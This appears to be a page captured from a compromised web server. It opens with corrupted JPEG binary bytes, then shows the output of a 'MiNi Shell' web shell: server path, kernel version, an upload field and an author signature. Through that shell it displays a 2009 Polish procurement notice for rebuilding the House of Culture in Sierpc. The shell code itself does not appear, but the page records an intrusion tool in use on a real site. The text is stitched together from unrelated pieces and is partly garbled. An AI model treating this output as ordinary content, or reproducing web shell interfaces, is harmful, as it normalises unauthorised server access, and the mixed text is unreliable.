JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090701/102743-N-2009.html

<p class="kh_header"><b>Sierpc: Adaptacja i rozbudowa Domu Kultury w Sierpcu</b><br>
<b>Numer ogłoszenia: 102743 - 2009; data zamieszczenia: 01.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Piastowska 11a, 09-200 Sierpc, woj. mazowieckie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sierpc.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Adaptacja i rozbudowa Domu Kultury w Sierpcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest adaptacja i rozbudowa Domu Kultury w Sierpcu. 
PODSTAWOWE DANE INWESTYCJI 
- Powierzchnia łączna-3467.9 m2 w tym: budynek istniejący (część A) 1502.5 m2, budynek projektowany (część B) 1965.4 m2. 
- Kubatura - 18058.0 m3. 
- Ilość kondygnacji - 2. 
- Maksymalna ilość użytkowników - 400, w tym 
- widzowie dużej sali widowiskowej - 298, 
- małej sali do ćwiczeń teatralnych - 54. 
- Ilość miejsc parkingowych - 43. 
Przedmiotem inwestycji jest adaptacja i rozbudowa Domu Kultury. W skład tej inwestycji wchodzą: 
a) modernizacja dwukondygnacyjnego budynku istniejącego z poddaszem nieużytkowym, 
b) realizacja dwukondygnacyjnego budynku z salą wielofunkcyjną. 
Obecnie na terenie przyszłej budowy znajdują się: 
a) budynek Domu Kultury - II kondygnacje + nieużytkowe poddasze, 
b) parterowy dobudowany od strony wschodniej budynek gospodarczy i garaż (do likwidacji), 
c) instalacje podziemne (do likwidacji i przeniesienia). 
Inwestycja leży na terenie uzbrojonym. Realizacja nowej części budynku wymaga częściowej likwidacji istniejącego podziemnego uzbrojenia terenu. 
Zaopatrzenie w wodę - w oparciu o istniejącą miejską sieć wodociągową. 
Odprowadzenie ścieków bytowych - do istniejącej sieci miejskiej kanalizacji sanitarnej w ulicach Piastowskiej i Świętokrzyskiej. 
Niezbędne jest wykonanie nowej kanalizacji deszczowej wokół istniejącego budynku (w chwili obecnej woda deszczowa z przeważającej części budynku jest odprowadzana w teren lub na teren). 
Zaopatrzenie w energię elektryczną - z istniejącej sieci; realizacja rozbudowy wymaga wybudowania wewnętrznej stacji transformatorowej. 
Budynek nie jest podłączony do sieci gazowej. 
Sieć teletechniczna - do istniejącej sieci. 
Budynek będzie w pełni dostępny dla osób niepełnosprawnych ruchowo. 
Zgodnie z Decyzją o warunkach zabudowy przedsięwzięcie zostało zaopiniowane pozytywnie przez Wojewódzkiego Konserwatora Zabytków (Postanowienie Wojewódzkiego Konserwatora Zabytków - Delegatura w Płocku z dn. 24.03 2005). Budynek został wpisany do rejestru zabytków zgodnie z Decyzją NR491/2009 z dn. 13.05.2009.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.26.26.90-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia przez Wykonawców wadium w wysokości 300 000 PLN (słownie: trzystu tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu: 
1. Posiada niezbędną wiedzę i doświadczenie - wykonał w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 robotę budowlaną polegającą na budowie, remoncie lub przebudowie, w rozumieniu prawa budowlanego, budynku użyteczności publicznej o powierzchni całkowitej budynku nie mniejszej niż 1 500 m2. 
W przypadku, gdy liczba wykonawców, którzy spełnią postawione warunki będzie większa niż 12, zamawiający zastosuje dodatkową kwalifikację w postaci przyznania wykonawcom po 1 pkt za każde dodatkowo wykonane ponad minimum kwalifikacyjne zamówienie polegające na wykonaniu robót określonych w niniejszym warunku, potwierdzone dokumentami świadczącymi o należytym wykonaniu wskazanego zamówienia i zaprosi do składania ofert tych wykonawców, którzy otrzymali najwyższą ocenę za spełnienie dodatkowego warunku. W przypadku, gdy minimalne warunki po zastosowaniu dodatkowej kwalifikacji spełni 12 lub mniej wykonawców, zamawiający dopuści do składania ofert wszystkich tych wykonawców. 
2. Dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia - w szczególności dysponuje minimum jedną osobą posiadającą uprawnienia budowlane określone przepisami Prawa budowlanego, które odbyły co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych (§8.1 Rozporządzenie Ministra Kultury z dn. 9 czerwca 2004 Dz.U.04.150.1579). 
3. Stosuje zarządzanie gospodarką odpadami w sposób oparty na europejskich normach (w tym na przykład: posiada stosowne pozwolenia i zezwolenia środowiskowe lub wnosi opłaty za korzystanie ze środowiska w Urzędach Marszałkowskich lub posiada odpowiednie wyposażenie służące ochronie środowiska). 
4. Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia - posiada rachunek potwierdzający wysokość posiadanych środków finansowych lub zdolność kredytową w wysokości 5.000.000 zł (pięć milionów złotych). 
5. Nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy Prawo zamówień publicznych. 
W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia, warunki nr 1-4 wykonawcy ci mogą spełniać łącznie, natomiast warunek nr 5. musi spełniać każdy z nich. 
Zamawiający dokona oceny spełnienia warunków na podstawie złożonych przez Wykonawców wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego na zasadzie spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy zobowiązani są dostarczyć następujące oświadczenia lub dokumenty dla potwierdzenia spełnienia warunków udziału w postępowaniu: 
1) wykaz wykonanych robót budowlanych polegających na budowie, remoncie lub przebudowie, w rozumieniu prawa budowlanego, budynków użyteczności publicznej o powierzchni całkowitej budynku nie mniejszej niż 1500 m2 w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z wyszczególnieniem: rodzaju wykonanych robót (ew. krótki opis robót), miejsca wykonania (nazwa obiektu i adres), powierzchni całkowitej, inwestora (adres, telefon, e-mail), daty odbioru robót (dzień, miesiąc, rok); oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. W przypadku składania wniosku o dopuszczenie do udziału w przetargu ograniczonym przez Wykonawców występujących wspólnie, w/w dokument mogą złożyć łącznie, 
2) oświadczenie zawierające treść o dysponowaniu potencjałem technicznym i osobami zdolnymi do wykonania zamówienia - w szczególności dysponowaniu minimum jedną osobą posiadającą uprawnienia budowlane określone przepisami Prawa budowlanego, które odbyły co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych (§8.1 Rozporządzenie Ministra Kultury z dn. 9 czerwca 2004 Dz.U.04.150.1579). W przypadku składania wniosku o dopuszczenie do udziału w przetargu ograniczonym przez Wykonawców występujących wspólnie, w/w dokument mogą złożyć łącznie, 
3) Oświadczenie Wykonawcy zawierające treść o stosowaniu zarządzania gospodarką odpadami w sposób oparty na europejskich normach (w tym na przykład o posiadaniu stosownego pozwolenia i zezwolenia środowiskowego lub o wnoszeniu opłaty za korzystanie ze środowiska w Urzędach Marszałkowskich lub o posiadaniu odpowiedniego wyposażenia służącego ochronie środowiska). W przypadku składania wniosku o dopuszczenie do udziału w przetargu ograniczonym przez Wykonawców występujących wspólnie, w/w dokument mogą złożyć łącznie, 
4) informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek, potwierdzającą wymaganą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w przetargu ograniczonym. W przypadku składania wniosku o dopuszczenie do udziału w przetargu ograniczonym  przez Wykonawców występujących wspólnie, w/w dokument składa ten lub ci z wykonawców, którzy spełnią warunek. Jeżeli Wykonawca przedstawi dokumenty, w których wartości podane będą w innej walucie niż PLN, to dla potwierdzenia spełnienia warunku Zamawiający dokona przeliczenia tej waluty na PLN wg wyliczonego i ogłoszonego przez Narodowy Bank Polski bieżącego średniego kursu na dzień publikacji ogłoszenia w Biuletynie Zamówień Publicznych (BZP), 
5) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosku o dopuszczenie do udziału w przetargu ograniczonym (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez kilku wykonawców we wniosku muszą być złożone przedmiotowe dokumenty każdego z nich). 
Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. (Dz. U. Nr 87, poz. 605 ze. zm.) w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać Zamawiający od wykonawcy, jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 5), składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument winien być wystawiony nie wcześniej niż 6 miesięcy przed terminem składania wniosku o dopuszczenie do udziału w przetargu ograniczonym; 
b) jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w lit. a) zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Wymagania dotyczące terminu wystawienia dokumentu, stosuje się odpowiednio jak dla dokumentu, o którym mowa w lit. a). 
WYMAGANIA DOTYCZACE SPORZADZENIA WNIOSKU O DOPUSZCZENIE DO UDZIAŁU W PRZETARGU OGRANICZONYM. 
Wykonawcy zainteresowani udziałem w postępowaniu składają w siedzibie zamawiającego - w pokoju nr 12 i w terminie określonym w niniejszym ogłoszeniu, w zamkniętej kopercie zaadresowanej na zamawiającego, oznaczonej nazwą wykonawcy i nazwą przedmiotu zamówienia, sporządzony samodzielnie pisemny wniosek o dopuszczenie do udziału w przetargu ograniczonym, zawierający: 
1. oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych i niniejszym ogłoszeniu, 
2. dokumenty wymienione w części: INFORMACJA O OŚWIADCZENIACH I DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU, 
3. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia do wniosku załączają pełnomocnictwo do reprezentowania wykonawców w trakcie postępowania (pełnomocnictwo może także obejmować jednoznacznie sformułowane uprawnienie do zawarcia umowy). Pełnomocnictwo musi być przedstawione w formie oryginału lub kopii poświadczonej notarialnie za zgodność z oryginałem. Pełnomocnictwo podpisują wszyscy wykonawcy ubiegający się wspólnie o udzielenie zamówienia. Pełnomocnik podpisuje wniosek o dopuszczenie do udziału w przetargu ograniczonym i załączone do niego dokumenty. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem, 
4. w przypadku podpisania wniosku o dopuszczenie do udziału w przetargu ograniczonym, oświadczeń lub innych dokumentów, a także poświadczenia za zgodność z oryginałem kopii dokumentów, przez osobę nie wymienioną w dokumencie rejestracyjnym, do wniosku należy dołączyć pełnomocnictwo dla tej osoby. Pełnomocnictwo musi być przedstawione w formie oryginału lub kopii poświadczonej notarialnie za zgodność z oryginałem, 
5. podpisanie wniosku i poświadczenie za zgodność z oryginałem winno być sporządzone w sposób umożliwiający identyfikację podpisu (np. czytelny podpis lub parafa wraz z imienną pieczątką osoby podpisującej dokument lub poświadczającej kopię), 
6. forma składanych dokumentów: 
1) zakres i forma składanych dokumentów muszą być zgodne z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Z dnia 24 maja 2006 r. nr 87, poz. 605). Dokumenty mogą być złożone w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem przez wykonawcę, 
2) wszystkie dokumenty złożone w języku obcym winny być złożone wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę, 
3) w przypadku złożenia kopii dokumentu w formie nieczytelnej lub budzącej wątpliwości, co do jej prawdziwości, zamawiający wezwie wykonawcę do przedstawienia w wyznaczonym terminie oryginału dokumentu lub jego notarialnie poświadczonej kopii, 
7. zgodnie z art. 67 ust.1 pkt.6 Pzp Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do 30% wartości zamówienia podstawowego, 
8. zamawiający dopuszcza możliwości zmiany umowy zawartej z Wykonawcą. Zmiana umowy jest możliwa jedynie w okolicznościach, określonych we wzorze umowy, 
9. zmiana umowy nie może dotyczyć zwiększenia zakresu przedmiotowego zamówienia, 
10. na etapie składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia nie przewiduje się udzielania żadnych wyjaśnień i odpowiedzi na zapytania.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 12.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Sierpcu
ul. Piastowska 11a
09-200 Sierpc
pok. 29.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2009 godzina 10:00, miejsce: Urząd Miejski w Sierpcu
ul. Piastowska 11a
09-200 Sierpc
pok. 12 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com